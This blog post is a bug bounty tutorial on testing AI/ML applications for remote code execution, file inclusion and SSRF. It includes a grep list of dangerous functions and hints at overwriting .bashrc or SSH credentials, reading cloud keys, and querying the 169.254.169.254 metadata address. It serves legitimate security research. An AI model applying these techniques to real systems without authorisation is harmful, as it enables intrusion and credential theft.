Bug Bounty has long been an established source of income in the cybersecurity industry. As insecure AI/ML-based applications enter the market in 2024, new bounty programs with low-hanging fruit are opening up.
In this post, I will outline the best bug bounty platform, the top vulnerabilities to search for, and a simple methodology to find your first bug.
Contents
The Best Bug Bounty Platform
Top Vulnerabilities
1 - Remote Code Execution
2 - File Inclusion
3 - Server-Side Request Forgery
High-Level Testing Methodology
Final Thoughts - The Future
The Best Bug Bounty Platform
While HackerOne and BugCrowd are good generic options, the best AI/ML-specific bug bounty platform is Huntr. This platform offers bounties of up to $3000 and has 250+ repositories in scope, allowing researchers to earn a lucrative salary by submitting bugs.
It’s worth noting that Huntr focuses on hacking applications and coding libraries used in AI/ML operations, as opposed to the models themselves. For more information on hacking AI models, check out this blog post,
Top Vulnerabilities
Huntr has identified 3 top vulnerabilities to search for when conducting penetration tests against AI/ML apps. These are all easy to find and have a high severity score, providing a good chance of paying out.
1 - Remote Code Execution
Remote Code Execution tends to be an immediate critical severity vulnerability, allowing an attacker to gain full control over a target server.
Many AI/ML libraries began life as programmatic interfaces, with APIs and web UIs developed later on. These later-developed components are often misconfigured, allowing attackers to directly execute commands through the web UI.
Next, if the app allows users to upload model files, it may insecurely run any code that was injected! This is known as insecure deserialization - you can read my article below to learn more.
2 - File Inclusion
File Inclusion may sound harmless, but it often leads to remote code execution and critical impact. Local File Inclusion enables attackers to read sensitive data from the web server, and Remote File Inclusion may let them execute malicious code embedded in files.
AI/ML applications need to support both data and model files. These often reside on several filesystem locations when users perform operations. Since there is no standard location for the files, AI/ML developers may give users excessive read/write access, paving the way for devastating exploits.
3 - Server-Side Request Forgery
SSRF is usually less severe than the top 2 vulnerabilities, yet its commonality in AI/ML apps makes it a prime candidate to test for. SSRF can be used to exfiltrate sensitive data, crash the target website, or remotely execute code in specific use cases.
Many AI platforms allow users to upload data in several ways - Amazon S3, HTTP, FTP, and more. Attackers may be able to control where these requests are sent. A common impact is inducing the server to query sensitive internal locations, such as router configuration pages.
High-Level Testing Methodology
You can get started testing AI/ML applications for vulnerabilities right away. The following high-level methodology was summarized from Huntr’s Tutorial page, which provides more detail for each step.
1. Static Code Analysis
Download an AI/ML library from GitHub.
Run a Snyk vulnerability scan on the library (free VSCode plugin).
Review the Snyk scan report.
Filter out non-relevant issues, such as XSS where JSON is returned or path traversals that affect non-user-facing utility scripts.
Identify the five files with the highest number of findings.
Perform a targeted search for dangerous functions and patterns:
eval(
exec(
subprocess.
os.system
pickle.dumps
pickle.loads
shell=True
yaml.load
2. Map Out The Application
Check the
/docs
directory for an OpenAPI specification.If unavailable, use a tool like ChatGPT to generate an API spec based on documentation.
Failing that, populate the application with test data and proxy traffic using a Web App Proxy tool.
Save and name each unique API request captured in the proxy.
Search for URL patterns such as
ftp://
,s3://
, andhttp://
in API requests, indicating potential SSRF vulnerabilities.
3. Automatic Testing
Perform an active scan on each API request.
Monitor each request in a logging tool and document any anomalies, such as unexpected status codes, unusually long responses, or truncated outputs.
4. Manual Testing
Inject payloads into each API request using the Big List of Naughty Strings.
Use sniper mode on Burp Suite to create multiple insertion points for comprehensive coverage.
Analyze all responses, looking for unusual status codes or variations in response length.
5. Authentication Testing
Download the Autorize plugin on Burp Suite.
Set up Autorize with a low-privilege user’s authentication token.
Navigate the application as a high-privilege user and ensure that access controls are properly enforced.
Verify that all privileged requests are restricted and logged correctly in the Autorize interface.
What to Look For:
Remote Code Execution
Often results from arbitrary file overwrites but can also occur in cases where user input is improperly executed within a command.
Review all instances of user input being placed directly into executable operations for vulnerabilities.
File Inclusion
Check API calls used for exporting models or datasets from the AI/ML system.
Overwriting critical files, such as
.bashrc
or SSH credentials, can often result in remote code execution.
Also check API calls that import or read models and data files, as they are susceptible to local file inclusion.
Look for endpoints that use naming conventions like
GetArtifact
orget-artifact
for opportunities to access sensitive files, such as SSH or cloud keys.
Server-Side Request Forgery (SSRF)
Target API calls that handle data from S3 buckets or accept URLs as input.
Exploit these to initiate internal network requests, potentially exposing services or internal metadata at addresses like
http://169.254.169.254/latest/meta-data/
.
Final Thoughts - The Future
Data scientists are not developers - they often lack the secure coding experience of professional software engineers. Unfortunately, the apps they develop are often full of high-severity bugs reminiscent of web applications 10+ years ago. There is a fantastic opportunity to make money via AI bug bounty programs right now!
As AI/ML apps and their associated bounties become more mainstream, vulnerabilities will be patched, and the risk of these applications being hacked will reduce. However, the impact of exploitation will increase as more organizations integrate such apps into their infrastructure. Learning about AI Security now will position security professionals to handle challenges like these in the future.
Share this post